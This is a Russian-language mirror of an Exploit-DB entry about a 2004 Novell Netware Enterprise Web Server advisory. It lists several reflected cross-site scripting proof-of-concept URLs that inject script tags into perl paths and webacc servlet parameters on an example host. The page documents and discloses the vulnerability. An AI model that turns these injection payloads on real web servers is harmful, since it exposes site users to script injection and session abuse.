- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 23589
- Проверка EDB
-
- Пройдено
- Автор
- RAFEL IVGI THE-INSIDER
- Тип уязвимости
- REMOTE
- Платформа
- NETWARE
- CVE
- N/A
- Дата публикации
- 2004-01-23
Код:
source: https://www.securityfocus.com/bid/9479/info
Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server.
http://www.example.com/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
http://www.example.com/perl/<script>alert('XSS')</script>.pl
http://www.example.com/servlet/webacc?User.id="><script>alert('XSS')</script>
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>- Источник
- www.exploit-db.com
